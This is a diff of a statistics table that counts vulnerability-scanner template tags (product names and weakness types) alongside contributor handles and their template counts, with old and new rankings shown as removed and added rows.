cloudtrail | 9 | parzival | 2 | | | | | | | -| cnvd2020 | 9 | bing0o | 2 | | | | | | | -| bitbucket | 9 | ehsahil | 2 | | | | | | | -| console | 9 | gevakun | 2 | | | | | | | -| kube | 9 | bp0lr | 2 | | | | | | | -| oauth | 8 | kre80r | 2 | | | | | | | -| ldap | 8 | koti2 | 2 | | | | | | | -| bucket | 8 | kishore-hariram | 2 | | | | | | | -| cisco-switch | 8 | dbrwsky | 2 | | | | | | | -| default-page | 8 | lstatro | 2 | | | | | | | -| ognl | 8 | k11h-de | 2 | | | | | | | -| lfprojects | 8 | myztique | 2 | | | | | | | -| symantec | 8 | vavkamil | 2 | | | | | | | -| spotweb | 8 | dheerajmadhukar | 2 | | | | | | | -| unauthenticated | 8 | y4er | 2 | | | | | | | -| microfocus | 8 | convisoappsec | 2 | | | | | | | -| nexus | 8 | mzack9999 | 2 | | | | | | | -| mirai | 8 | hackerarpan | 2 | | | | | | | -| phpjabbers | 8 | michal mikolas (nanuqcz) | 2 | | | | | | | -| spotweb_project | 8 | thezakman | 2 | | | | | | | -| discord | 8 | clarkvoss | 2 | | | | | | | -| mlflow | 8 | ritesh_gohil(#l4stpl4y3r) | 2 | | | | | | | -| cloud-enum | 8 | w4cky_ | 2 | | | | | | | -| openemr | 8 | moritz nentwig | 2 | | | | | | | -| phpinfo | 8 | israel comazzetto dos reis | 2 | | | | | | | -| hms | 8 | zomsop82 | 2 | | | | | | | -| odoo | 8 | lotusdll | 2 | | | | | | | -| osint-news | 8 | pxmme1337 | 2 | | | | | | | -| emerge | 8 | paradessia | 2 | | | | | | | -| e-office | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| nagiosxi | 8 | gal nagli | 2 | | | | | | | -| metadata | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| recon | 8 | nuk3s3c | 2 | | | | | | | -| huawei | 8 | g4l1t0 | 2 | | | | | | | -| solarwinds | 8 | dahse89 | 2 | | | | | | | -| cacti | 8 | bananabr | 2 | | | | | | | -| atom | 8 | randomdhiraj | 2 | | | | | | | -| config-audit | 8 | bsysop | 2 | | | | | | | -| manager | 8 | ayadim | 2 | | | | | | | -| go | 8 | v0idc0de | 2 | | | | | | | -| wanhu | 8 | zy9ard3 | 2 | | | | | | | -| teamcity | 7 | redteambrasil | 2 | | | | | | | -| car_rental_management_system_project | 7 | diablo | 1 | | | | | | | -| pmb | 7 | piyushchhiroliya | 1 | | | | | | | -| geoserver | 7 | th3r4id | 1 | | | | | | | -| telesquare | 7 | 2rs3c | 1 | | | | | | | -| maps | 7 | kishore krishna (sillydaddy) | 1 | | | | | | | -| vrealize | 7 | numan türle | 1 | | | | | | | -| nacos | 7 | amnotacat | 1 | | | | | | | -| landray | 7 | ph33rr | 1 | | | | | | | -| linkedin | 7 | caon | 1 | | | | | | | -| gogs | 7 | 0xprial | 1 | | | | | | | -| error | 7 | rivalsec | 1 | | | | | | | -| twitter | 7 | sttlr | 1 | | | | | | | -| nortekcontrol | 7 | bad5ect0r | 1 | | | | | | | -| gradio | 7 | arr0way | 1 | | | | | | | -| pods | 7 | luqman | 1 | | | | | | | -| vpc | 7 | breno_css | 1 | | | | | | | -| bigip | 7 | ratnadip gajbhiye | 1 | | | | | | | -| fortios | 7 | pry0cc | 1 | | | | | | | -| contec | 7 | noah @thesubtlety | 1 | | | | | | | -| ruckus | 7 | colbyjack1134 | 1 | | | | | | | -| websphere | 7 | akokonunes | 1 | | | | | | | -| monstra | 7 | failopen | 1 | | | | | | | -| keking | 7 | viondexd | 1 | | | | | | | -| exploitdb | 7 | d0rkerdevil | 1 | | | | | | | -| moodating | 7 | intx0x80 | 1 | | | | | | | -| rfi | 7 | screamy | 1 | | | | | | | -| avtech | 7 | palanichamy_perumal | 1 | | | | | | | -| shopify | 7 | jonathanwalker | 1 | | | | | | | -| oos | 7 | hakluke | 1 | | | | | | | -| activemq | 7 | alexrydzak | 1 | | | | | | | -| blockchain | 7 | zeroc00i | 1 | | | | | | | -| vms | 7 | technicaljunkie | 1 | | | | | | | -| slack | 7 | tea | 1 | | | | | | | -| bloofox | 7 | elmahdi | 1 | | | | | | | -| opensis | 7 | j3ssie/geraldino2 | 1 | | | | | | | -| splunk | 7 | yhy0 | 1 | | | | | | | -| mobileiron | 7 | co0nan | 1 | | | | | | | -| database | 7 | open-sec | 1 | | | | | | | -| squirrelmail | 7 | fq_hsu | 1 | | | | | | | -| mongodb | 7 | igibanez | 1 | | | | | | | -| filemanager | 7 | kr1shna4garwal | 1 | | | | | | | -| fpd | 7 | staticnoise | 1 | | | | | | | -| beyondtrust | 6 | _harleo | 1 | | | | | | | -| online_fire_reporting_system_project | 6 | p-l- | 1 | | | | | | | -| online-fire-reporting | 6 | toufik-airane | 1 | | | | | | | -| kubelet | 6 | omarjezi | 1 | | | | | | | -| asp | 6 | r3nz0 | 1 | | | | | | | -| rat | 6 | tehtbl | 1 | | | | | | | -| webmin | 6 | andysvints | 1 | | | | | | | -| sql | 6 | aaron_costello | 1 | | | | | | | +| osint-art | 14 | parth | 3 | | | | | | | +| redis | 14 | xianke | 3 | | | | | | | +| rds | 14 | swissky | 3 | | | | | | | +| domainmod | 14 | coldfish | 3 | | | | | | | +| login-check | 14 | yash anand @yashanand155 | 3 | | | | | | | +| icewarp | 14 | canberbamber | 3 | | | | | | | +| node | 14 | shifacyclewala | 3 | | | | | | | +| dell | 14 | true13 | 3 | | | | | | | +| postgresql | 13 | johnjhacking | 3 | | | | | | | +| auth | 13 | ph33r | 3 | | | | | | | +| fortigate | 13 | charles d | 3 | | | | | | | +| sonicwall | 13 | c4sper0 | 3 | | | | | | | +| osint-dating | 13 | fyoorer | 3 | | | | | | | +| fuzzing | 13 | 8arthur | 2 | | | | | | | +| cuppacms | 13 | charles d. | 2 | | | | | | | +| laravel | 13 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| rails | 13 | paperpen | 2 | | | | | | | +| cuppa | 13 | msegoviag | 2 | | | | | | | +| abstractapi | 13 | lstatro | 2 | | | | | | | +| mysql | 13 | gal nagli | 2 | | | | | | | +| airflow | 13 | thezakman | 2 | | | | | | | +| kafka | 13 | serrapa | 2 | | | | | | | +| windows | 13 | joshlarsen | 2 | | | | | | | +| cache | 13 | ayadim | 2 | | | | | | | +| graphql | 13 | brenocss | 2 | | | | | | | +| osint-political | 13 | ricardo maia (brainfork) | 2 | | | | | | | +| hashicorp | 13 | zy9ard3 | 2 | | | | | | | +| spring | 12 | dahse89 | 2 | | | | | | | +| webserver | 12 | nuk3s3c | 2 | | | | | | | +| hikvision | 12 | w4cky_ | 2 | | | | | | | +| jetbrains | 12 | 0xsapra | 2 | | | | | | | +| deployments | 12 | geekby | 2 | | | | | | | +| zimbra | 12 | convisoappsec | 2 | | | | | | | +| phpgurukul | 12 | bing0o | 2 | | | | | | | +| newrelic | 12 | c3l3si4n | 2 | | | | | | | +| drupal | 12 | hetroublemakr | 2 | | | | | | | +| netsweeper | 12 | codexlynx | 2 | | | | | | | +| vbulletin | 12 | g4l1t0 | 2 | | | | | | | +| doppler | 12 | shankaracharya | 2 | | | | | | | +| smb | 12 | 0xcrypto | 2 | | | | | | | +| ofbiz | 12 | lotusdll | 2 | | | | | | | +| thinkphp | 11 | sbani | 2 | | | | | | | +| iis | 11 | x1m_martijn | 2 | | | | | | | +| osint-video | 11 | thardt-praetorian | 2 | | | | | | | +| progress | 11 | ajaysenr | 2 | | | | | | | +| fastjson | 11 | zomsop82 | 2 | | | | | | | +| django | 11 | paradessia | 2 | | | | | | | +| xstream | 11 | thabisocn | 2 | | | | | | | +| dedecms | 11 | github.com/its0x08 | 2 | | | | | | | +| prometheus | 11 | h0j3n | 2 | | | | | | | +| glpi | 11 | kre80r | 2 | | | | | | | +| jolokia | 11 | k11h-de | 2 | | | | | | | +| iam | 11 | v0idc0de | 2 | | | | | | | +| elasticsearch | 10 | manas_harsh | 2 | | | | | | | +| phpmyadmin | 10 | notnotnotveg | 2 | | | | | | | +| xstream_project | 10 | usdag | 2 | | | | | | | +| samsung | 10 | supras | 2 | | | | | | | +| digitalocean | 10 | parzival | 2 | | | | | | | +| crlf | 10 | d4vy | 2 | | | | | | | +| dropbox | 10 | kishore-hariram | 2 | | | | | | | +| blind | 10 | clarkvoss | 2 | | | | | | | +| zabbix | 10 | 0xelkomy | 2 | | | | | | | +| symfony | 10 | sinsinology | 2 | | | | | | | +| solr | 10 | dheerajmadhukar | 2 | | | | | | | +| solarview | 10 | sy3omda | 2 | | | | | | | +| dahua | 10 | luci | 2 | | | | | | | +| db | 10 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| instrusive | 10 | dogancanbakir | 2 | | | | | | | +| sitecore | 10 | shelled | 2 | | | | | | | +| sangfor | 9 | kiblyn11 | 2 | | | | | | | +| f5 | 9 | herry | 2 | | | | | | | +| versa | 9 | rafaelwdornelas | 2 | | | | | | | +| sophos | 9 | martincodes-de | 2 | | | | | | | +| facebook | 9 | liwermor | 2 | | | | | | | +| cloudtrail | 9 | raesene | 2 | | | | | | | +| kube | 9 | afaq | 2 | | | | | | | +| artica | 9 | wa1tf0rme | 2 | | | | | | | +| secret | 9 | cckuakilong | 2 | | | | | | | +| gitea | 9 | davidegirardi | 2 | | | | | | | +| moodle | 9 | joshua rogers | 2 | | | | | | | +| python | 9 | bmcel | 2 | | | | | | | +| vcenter | 9 | randomdhiraj | 2 | | | | | | | +| pfsense | 9 | michal mikolas (nanuqcz) | 2 | | | | | | | +| wso2 | 9 | maximus decimus | 2 | | | | | | | +| servicenow | 9 | 0xnirvana | 2 | | | | | | | +| opencats | 9 | 6mile | 2 | | | | | | | +| firebase | 9 | 666asd | 2 | | | | | | | +| bitbucket | 9 | foulenzer | 2 | | | | | | | +| cnvd2020 | 9 | t3l3machus | 2 | | | | | | | +| exchange | 9 | udit_thakkur | 2 | | | | | | | +| scada | 9 | dbrwsky | 2 | | | | | | | +| console | 9 | 0xrudra | 2 | | | | | | | +| lucee | 9 | moritz nentwig | 2 | | | | | | | +| joomla\! | 9 | florianmaak | 2 | | | | | | | +| elastic | 9 | christianpoeschl | 2 | | | | | | | +| druid | 9 | ep1csage | 2 | | | | | | | +| gateway | 9 | pxmme1337 | 2 | | | | | | | +| config-audit | 8 | koti2 | 2 | | | | | | | +| cloud-enum | 8 | gevakun | 2 | | | | | | | +| default-page | 8 | ree4pwn | 2 | | | | | | | +| spotweb | 8 | ehsahil | 2 | | | | | | | +| unauthenticated | 8 | egemenkochisarli | 2 | | | | | | | +| openemr | 8 | pbuff07 | 2 | | | | | | | +| osint-news | 8 | hackerarpan | 2 | | | | | | | +| discord | 8 | bananabr | 2 | | | | | | | +| phpjabbers | 8 | 0xsmiley | 2 | | | | | | | +| recon | 8 | sascha brendel | 2 | | | | | | | +| huawei | 8 | socketz | 2 | | | | | | | +| go | 8 | joeldeleep | 2 | | | | | | | +| oauth | 8 | danmcinerney | 2 | | | | | | | +| microfocus | 8 | amsda | 2 | | | | | | | +| symantec | 8 | danielmofer | 2 | | | | | | | +| solarwinds | 8 | nkxxkn | 2 | | | | | | | +| spotweb_project | 8 | z0ne | 2 | | | | | | | +| lfprojects | 8 | ritesh_gohil(#l4stpl4y3r) | 2 | | | | | | | +| ldap | 8 | n-thumann | 2 | | | | | | | +| atom | 8 | streetofhackerr007 | 2 | | | | | | | +| odoo | 8 | uomogrande | 2 | | | | | | | +| nagiosxi | 8 | y4er | 2 | | | | | | | +| wanhu | 8 | mzack9999 | 2 | | | | | | | +| cacti | 8 | bsysop | 2 | | | | | | | +| manager | 8 | sinkettu | 2 | | | | | | | +| nexus | 8 | vavkamil | 2 | | | | | | | +| phpinfo | 8 | redteambrasil | 2 | | | | | | | +| ognl | 8 | supr4s | 2 | | | | | | | +| metadata | 8 | bp0lr | 2 | | | | | | | +| hms | 8 | israel comazzetto dos reis | 2 | | | | | | | +| emerge | 8 | cocxanh | 2 | | | | | | | +| cisco-switch | 8 | brucelsone | 2 | | | | | | | +| mlflow | 8 | korteke | 2 | | | | | | | +| mirai | 8 | thevillagehacker | 2 | | | | | | | +| e-office | 8 | topscoder | 2 | | | | | | | +| bucket | 8 | myztique | 2 | | | | | | | +| telesquare | 7 | mrharshvardhan | 2 | | | | | | | +| database | 7 | qotoz | 1 | | | | | | | +| oos | 7 | palanichamy_perumal | 1 | | | | | | | +| ruckus | 7 | high | 1 | | | | | | | +| blockchain | 7 | dabla | 1 | | | | | | | +| bloofox | 7 | ndmalc | 1 | | | | | | | +| maps | 7 | naglis | 1 | | | | | | | +| vpc | 7 | vthiery | 1 | | | | | | | +| landray | 7 | hakluke | 1 | | | | | | | +| contec | 7 | rotemreiss | 1 | | | | | | | +| fpd | 7 | kr1shna4garwal | 1 | | | | | | | +| opensis | 7 | ratnadip gajbhiye | 1 | | | | | | | +| squirrelmail | 7 | numan türle | 1 | | | | | | | +| pmb | 7 | secthebit | 1 | | | | | | | +| car_rental_management_system_project | 7 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| jamf | 6 | defektive | 1 | | | | | | | -| cockpit | 6 | jbertman | 1 | | | | | | | -| gcp | 6 | michael wedl | 1 | | | | | | | -| cobbler | 6 | amirmsafari | 1 | | | | | | | +| pods | 7 | ky9oss | 1 | | | | | | | +| filemanager | 7 | 2rs3c | 1 | | | | | | | +| cnvd2023 | 7 | adrianmf | 1 | | | | | | | +| vrealize | 7 | davidfegyver | 1 | | | | | | | +| websphere | 7 | mohammedsaneem | 1 | | | | | | | +| rfi | 7 | alex | 1 | | | | | | | +| geoserver | 7 | geraldino2 | 1 | | | | | | | +| exploitdb | 7 | samuelsamuelsamuel | 1 | | | | | | | +| moodating | 7 | shifacyclewla | 1 | | | | | | | +| monstra | 7 | patrick pirker | 1 | | | | | | | +| nacos | 7 | jbaines-r7 | 1 | | | | | | | +| mobileiron | 7 | y0no | 1 | | | | | | | +| splunk | 7 | floriandewald | 1 | | | | | | | +| shopify | 7 | staticnoise | 1 | | | | | | | +| keking | 7 | lark lab | 1 | | | | | | | +| gradio | 7 | adamparsons | 1 | | | | | | | +| slack | 7 | akash.c | 1 | | | | | | | +| activemq | 7 | daffianfo | 1 | | | | | | | +| vms | 7 | aaronchen0 | 1 | | | | | | | +| fortios | 7 | puben | 1 | | | | | | | +| teamcity | 7 | jas37 | 1 | | | | | | | +| gogs | 7 | hateshape | 1 | | | | | | | +| bigip | 7 | mhdsamx | 1 | | | | | | | +| mongodb | 7 | erikowen | 1 | | | | | | | +| nextjs | 7 | chetgan | 1 | | | | | | | +| avtech | 7 | mlec | 1 | | | | | | | +| nortekcontrol | 7 | failopen | 1 | | | | | | | +| linkedin | 7 | deena | 1 | | | | | | | +| error | 7 | lamscun | 1 | | | | | | | +| twitter | 7 | amanrawat | 1 | | | | | | | +| leak | 7 | schniggie | 1 | | | | | | | +| asus | 6 | jfbes | 1 | | | | | | | +| liferay | 6 | akshansh | 1 | | | | | | | +| microstrategy | 6 | mesaglio | 1 | | | | | | | +| kubelet | 6 | denandz | 1 | | | | | | | +| beyondtrust | 6 | millermedia | 1 | | | | | | | +| synacor | 6 | zeroc00i | 1 | | | | | | | +| log | 6 | x6263 | 1 | | | | | | | +| chanjet | 6 | th3.d1p4k | 1 | | | | | | | +| jetty | 6 | win3zz | 1 | | | | | | | +| cockpit | 6 | 0xrod | 1 | | | | | | | +| rat | 6 | manuelbua | 1 | | | | | | | +| paypal | 6 | affix | 1 | | | | | | | +| bmc | 6 | soyelmago | 1 | | | | | | | +| gcp | 6 | alevsk | 1 | | | | | | | +| 74cms | 6 | francescocarlucci | 1 | | | | | | | +| asp | 6 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| mikrotik | 6 | ohlinge | 1 | | | | | | | +| craftcms | 6 | nerrorsec | 1 | | | | | | | +| couchdb | 6 | kba@sogeti_esec | 1 | | | | | | | +| avideo | 6 | kaks3c | 1 | | | | | | | | paloaltonetworks | 6 | spac3wh1te | 1 | | | | | | | -| elfinder | 6 | jeya.seelan | 1 | | | | | | | -| doctor_appointment_system_project | 6 | cbadke | 1 | | | | | | | -| express | 6 | luciannitescu | 1 | | | | | | | -| log | 6 | zn9988 | 1 | | | | | | | -| sonarqube | 6 | whotwagner | 1 | | | | | | | -| couchdb | 6 | sospiro | 1 | | | | | | | -| doctor-appointment-system | 6 | ky9oss | 1 | | | | | | | -| 74cms | 6 | hanlaomo | 1 | | | | | | | -| leak | 6 | makyotox | 1 | | | | | | | -| chanjet | 6 | prettyboyaaditya | 1 | | | | | | | -| security | 6 | jadu101 | 1 | | | | | | | -| liferay | 6 | chesterblue | 1 | | | | | | | -| jetty | 6 | pudsec | 1 | | | | | | | -| asus | 6 | phyr3wall | 1 | | | | | | | -| servicenow | 6 | byobin | 1 | | | | | | | -| minio | 6 | liquidsec | 1 | | | | | | | -| jeecg | 6 | invisiblethreat | 1 | | | | | | | -| microstrategy | 6 | anonymous | 1 | | | | | | | -| paypal | 6 | arall | 1 | | | | | | | -| advantech | 6 | alevsk | 1 | | | | | | | -| keycloak | 6 | pussycat0 | 1 | | | | | | | -| flutterwave | 6 | schniggie | 1 | | | | | | | -| cnvd2023 | 6 | yavolo | 1 | | | | | | | -| tikiwiki | 6 | majidmc2 | 1 | | | | | | | -| plesk | 6 | amanrawat | 1 | | | | | | | -| typo3 | 6 | m0ck3d | 1 | | | | | | | -| zhiyuan | 6 | rojanrijal | 1 | | | | | | | -| synacor | 6 | notsoevilweasel | 1 | | | | | | | -| server | 6 | qianbenhyu | 1 | | | | | | | -| mikrotik | 6 | mayank_pandey01 | 1 | | | | | | | -| magmi | 6 | babybash | 1 | | | | | | | -| openvpn | 6 | bartu utku sarp | 1 | | | | | | | -| bmc | 6 | mlec | 1 | | | | | | | -| asana | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| redmine | 5 | chetgan | 1 | | | | | | | -| webview | 5 | d4ly | 1 | | | | | | | -| matrix | 5 | yaser_s | 1 | | | | | | | -| sentry | 5 | whynotke | 1 | | | | | | | -| glpi-project | 5 | vzamanillo | 1 | | | | | | | -| gocd | 5 | dk999 | 1 | | | | | | | -| open-emr | 5 | mordavid | 1 | | | | | | | -| http | 5 | pwnwithlove | 1 | | | | | | | -| resin | 5 | nielsing | 1 | | | | | | | -| zzzcms | 5 | thelicato | 1 | | | | | | | -| hybris | 5 | b4uh0lz | 1 | | | | | | | -| circarlife | 5 | yashanand155 | 1 | | | | | | | -| wpdevart | 5 | erethon | 1 | | | | | | | -| genetechsolutions | 5 | marcio mendes | 1 | | | | | | | -| strapi | 5 | davidfegyver | 1 | | | | | | | -| parallels | 5 | elouhi | 1 | | | | | | | -| hoteldruid | 5 | narluin | 1 | | | | | | | -| react | 5 | daffianfo | 1 | | | | | | | -| chamilo | 5 | paper-pen | 1 | | | | | | | -| 10web | 5 | 0xtavian | 1 | | | | | | | -| apisix | 5 | irshadahamed | 1 | | | | | | | -| jabber | 5 | eremit4 | 1 | | | | | | | -| papercut | 5 | miryangjung | 1 | | | | | | | -| nuuo | 5 | hel10-web | 1 | | | | | | | -| magmi_project | 5 | none | 1 | | | | | | | -| firmware | 5 | xeldax | 1 | | | | | | | -| percha | 5 | samuelsamuelsamuel | 1 | | | | | | | -| connectwise | 5 | marcos_iaf | 1 | | | | | | | -| voip | 5 | bibeksapkota (sar00n) | 1 | | | | | | | -| jwt | 5 | 0ut0fb4nd | 1 | | | | | | | -| terramaster | 5 | micha3lb3n | 1 | | | | | | | -| crushftp | 5 | xcapri | 1 | | | | | | | -| avaya | 5 | hlop | 1 | | | | | | | -| dionaea | 5 | unp4ck | 1 | | | | | | | -| square | 5 | deena | 1 | | | | | | | -| openstack | 5 | alperenkesk | 1 | | | | | | | -| ems | 5 | akshansh | 1 | | | | | | | -| rseenet | 5 | kiks7 | 1 | | | | | | | -| openfire | 5 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| cdata | 5 | guax1 | 1 | | | | | | | -| blackenergy | 5 | kaks3c | 1 | | | | | | | -| totolink | 5 | ynnirc | 1 | | | | | | | -| decision-center | 5 | kabirsuda | 1 | | | | | | | -| graylog | 5 | allenwest24 | 1 | | | | | | | -| schneider-electric | 5 | aringo-bf | 1 | | | | | | | -| ethereum | 5 | rschio | 1 | | | | | | | -| adminer | 5 | iphantasmic | 1 | | | | | | | -| spark | 5 | fmunozs | 1 | | | | | | | -| goanywhere | 5 | fopina | 1 | | | | | | | -| api-server | 5 | chron0x | 1 | | | | | | | -| adb | 5 | harryha | 1 | | | | | | | -| awstats | 5 | dmartyn | 1 | | | | | | | -| froxlor | 5 | pascalheidmann | 1 | | | | | | | -| storage | 5 | oscarintherocks | 1 | | | | | | | -| learnpress | 5 | esonhugh | 1 | | | | | | | -| jupyter | 5 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| agentejo | 5 | 0xparth | 1 | | | | | | | -| akamai | 5 | ofjaaah | 1 | | | | | | | -| webkul | 5 | freakyclown | 1 | | | | | | | -| acm | 5 | mr.bobo hp | 1 | | | | | | | -| digitaldruid | 5 | aaronchen0 | 1 | | | | | | | -| swagger | 5 | tirtha | 1 | | | | | | | -| craftcms | 5 | momen eldawakhly | 1 | | | | | | | -| caucho | 5 | dabla | 1 | | | | | | | -| h3c | 5 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| apollo | 5 | sak1 | 1 | | | | | | | -| gnu | 5 | francescocarlucci | 1 | | | | | | | -| etcd | 5 | mabdullah22 | 1 | | | | | | | -| cve2007 | 5 | revblock | 1 | | | | | | | -| metinfo | 5 | tirtha_mandal | 1 | | | | | | | -| openai | 5 | opencirt | 1 | | | | | | | -| axigen | 5 | shelld3v | 1 | | | | | | | -| thedigitalcraft | 5 | x6263 | 1 | | | | | | | -| pyload | 5 | sshell | 1 | | | | | | | -| wbce | 5 | shiar | 1 | | | | | | | -| sftp | 5 | tim_koopmans | 1 | | | | | | | -| qdpm | 5 | zeyad azima | 1 | | | | | | | -| tibco | 5 | carson chan | 1 | | | | | | | -| sysaid | 5 | ramkrishna sawant | 1 | | | | | | | -| web3 | 5 | watchtowr | 1 | | | | | | | -| vehicle_service_management_system_project | 5 | aravind | 1 | | | | | | | -| hpe | 5 | dale clarke | 1 | | | | | | | -| carrental | 5 | carrot2 | 1 | | | | | | | -| mantisbt | 5 | jub0bs | 1 | | | | | | | -| cloudflare | 5 | absshax | 1 | | | | | | | -| elementor | 5 | rinolock | 1 | | | | | | | -| kkfileview | 5 | un-fmunozs | 1 | | | | | | | -| checkpoint | 5 | 0xceeb | 1 | | | | | | | -| avideo | 5 | evolutionsec | 1 | | | | | | | -| qnap | 5 | furkansayim | 1 | | | | | | | -| mssql | 5 | duty_1g | 1 | | | | | | | -| circontrol | 5 | youngpope | 1 | | | | | | | -| fatpipe | 5 | apple | 1 | | | | | | | -| tenda | 5 | rodnt | 1 | | | | | | | -| telerik | 5 | dali | 1 | | | | | | | -| xmlrpc | 5 | hczdmr | 1 | | | | | | | -| password | 5 | 8authur | 1 | | | | | | | -| nosqli | 4 | infosecsanyam | 1 | | | | | | | -| supsystic | 4 | _darrenmartyn | 1 | | | | | | | -| salesforce | 4 | ldionmarcil | 1 | | | | | | | -| zte | 4 | f1she3 | 1 | | | | | | | -| grav | 4 | josecosta | 1 | | | | | | | -| piwigo | 4 | yashvardhantripathi | 1 | | | | | | | -| wcs | 4 | sorrowx3 | 1 | | | | | | | -| angular | 4 | retr02332 | 1 | | | | | | | -| containers | 4 | stux | 1 | | | | | | | -| owncloud | 4 | nagli | 1 | | | | | | | -| mostra | 4 | west-wise | 1 | | | | | | | -| roxy | 4 | mohsen yaghoubi | 1 | | | | | | | -| jellyfin | 4 | mayankpandey01 | 1 | | | | | | | -| terra-master | 4 | kurohost | 1 | | | | | | | -| proftpd | 4 | j33n1k4 | 1 | | | | | | | -| audiocodes | 4 | amir-h-fallahi | 1 | | | | | | | -| os4ed | 4 | hexcat | 1 | | | | | | | -| phppgadmin | 4 | gboddin | 1 | | | | | | | -| hospital_management_system_project | 4 | omarkurt | 1 | | | | | | | -| bitrix | 4 | furkansenan | 1 | | | | | | | -| springcloud | 4 | carlosvieira | 1 | | | | | | | -| globalprotect | 4 | ahmed abou-ela | 1 | | | | | | | -| sendgrid | 4 | notwhy | 1 | | | | | | | -| wp-statistics | 4 | jbaines-r7 | 1 | | | | | | | -| hongdian | 4 | juicypotato1 | 1 | | | | | | | -| wireguard | 4 | pdp | 1 | | | | | | | -| env | 4 | h4kux | 1 | | | | | | | -| pixie | 4 | becivells | 1 | | | | | | | -| codoso | 4 | mass0ma | 1 | | | | | | | -| linuxfoundation | 4 | 0xh7ml | 1 | | | | | | | -| ebs | 4 | hotpot | 1 | | | | | | | -| panabit | 4 | aron molnar | 1 | | | | | | | -| rubyonrails | 4 | lamscun | 1 | | | | | | | -| bittrex | 4 | jaimin gondaliya | 1 | | | | | | | -| codeigniter | 4 | michal-mikolas | 1 | | | | | | | -| gnuboard | 4 | ap3r | 1 | | | | | | | -| seagate | 4 | tangxiaofeng7 | 1 | | | | | | | -| yeswiki | 4 | borna nematzadeh | 1 | | | | | | | -| dahuasecurity | 4 | flag007 | 1 | | | | | | | -| pmb_project | 4 | mihhailsokolov | 1 | | | | | | | -| jsf | 4 | philippdelteil | 1 | | | | | | | -| aura | 4 | exceed | 1 | | | | | | | -| juniper | 4 | ahmed sherif | 1 | | | | | | | -| flatpress | 4 | act1on3 | 1 | | | | | | | -| arcgis | 4 | savik | 1 | | | | | | | -| httpserver | 4 | dievus | 1 | | | | | | | -| linkerd | 4 | ruppde | 1 | | | | | | | -| kentico | 4 | christbowel | 1 | | | | | | | -| ghost | 4 | ledoubletake | 1 | | | | | | | -| flink | 4 | unkl4b | 1 | | | | | | | -| dotnet | 4 | undefl0w | 1 | | | | | | | -| mautic | 4 | shreyapohekar | 1 | | | | | | | -| finicity | 4 | gpiechnik2 | 1 | | | | | | | -| figma | 4 | barthy.koeln | 1 | | | | | | | -| horde | 4 | 0xceba | 1 | | | | | | | -| sound4 | 4 | lbb | 1 | | | | | | | -| royalevent | 4 | nerrorsec | 1 | | | | | | | -| heroku | 4 | david botelho mariano | 1 | | | | | | | -| info | 4 | am0nt31r0 | 1 | | | | | | | -| telegram | 4 | godfatherorwa | 1 | | | | | | | -| ternaria | 4 | jacalynli | 1 | | | | | | | -| mitel | 4 | archer | 1 | | | | | | | -| thinkcmf | 4 | erikowen | 1 | | | | | | | -| webmail | 4 | null_hypothesis | 1 | | | | | | | -| dom | 4 | aresx | 1 | | | | | | | -| eyoucms | 4 | ptonewreckin | 1 | | | | | | | -| easypost | 4 | 0xcharan | 1 | | | | | | | -| creativeitem | 4 | millermedia | 1 | | | | | | | -| igniterealtime | 4 | ohlinge | 1 | | | | | | | -| moveit | 4 | elder tao | 1 | | | | | | | -| imgproxy | 4 | lixts | 1 | | | | | | | -| pentaho | 4 | luqmaan hadia | 1 | | | | | | | -| stripe | 4 | pepitoh | 1 | | | | | | | -| ransomware | 4 | phillipo | 1 | | | | | | | -| joomlamo | 4 | daviey | 1 | | | | | | | -| kingsoft | 4 | izn0u | 1 | | | | | | | -| rocketchat | 4 | hazana | 1 | | | | | | | -| cve2005 | 4 | domenicoveneziano | 1 | | | | | | | -| thimpress | 4 | kagamigawa | 1 | | | | | | | -| aspose | 4 | mubassirpatel | 1 | | | | | | | -| pega | 4 | abbas.heybati | 1 | | | | | | | -| fit2cloud | 4 | ipanda | 1 | | | | | | | -| pip | 4 | yashgoti | 1 | | | | | | | -| eclipse | 4 | mys7ic | 1 | | | | | | | -| churchcrm | 4 | rotembar | 1 | | | | | | | -| panos | 4 | r3s ost | 1 | | | | | | | -| hongfan | 4 | dorkerdevil | 1 | | | | | | | -| phpjabber | 4 | vinit989 | 1 | | | | | | | -| kibana | 4 | h4sh5 | 1 | | | | | | | -| concrete | 4 | jc175 | 1 | | | | | | | -| age-encryption | 4 | bywalks | 1 | | | | | | | -| opencms | 4 | s1r1u5_ | 1 | | | | | | | -| mooveagency | 4 | ola456 | 1 | | | | | | | -| metersphere | 4 | xiaowangsec | 1 | | | | | | | -| postmessage | 4 | ramondunker | 1 | | | | | | | -| kevinlab | 4 | 0xd0ff9 | 1 | | | | | | | -| sugarcrm | 4 | adrianmf | 1 | | | | | | | -| casaos | 4 | 0xteles | 1 | | | | | | | -| ampache | 4 | rubina119 | 1 | | | | | | | -| jfrog | 4 | smaranchand | 1 | | | | | | | -| nextjs | 4 | secthebit | 1 | | | | | | | -| intelbras | 4 | lrtk-coder | 1 | | | | | | | -| artifactory | 4 | drewvravick | 1 | | | | | | | -| powerjob | 4 | hakimkt | 1 | | | | | | | -| mostracms | 4 | willd96 | 1 | | | | | | | -| osgeo | 4 | johndoeanonita | 1 | | | | | | | -| newstatpress | 4 | affix | 1 | | | | | | | -| myeventon | 4 | yuansec | 1 | | | | | | | -| cnvd2019 | 4 | ndmalc | 1 | | | | | | | -| tiki | 4 | mohammad reza omrani | | 1 | | | | | | | -| | | @omranisecurity | | | | | | | | -| search | 4 | w8ay | 1 | | | | | | | -| reprisesoftware | 4 | shivampand3y | 1 | | | | | | | -| puppet | 4 | imhunterand | 1 | | | | | | | -| articatech | 4 | realexp3rt | 1 | | | | | | | -| metabase | 4 | olewagner | 1 | | | | | | | -| pluginus | 4 | luskabol | 1 | | | | | | | -| umbraco | 4 | gonski | 1 | | | | | | | -| mcafee | 4 | n0el4kls | 1 | | | | | | | -| dolibarr | 4 | soyelmago | 1 | | | | | | | -| photo | 4 | sicksec | 1 | | | | | | | -| harbor | 4 | bugvsme | 1 | | | | | | | -| metasploit | 4 | shiva 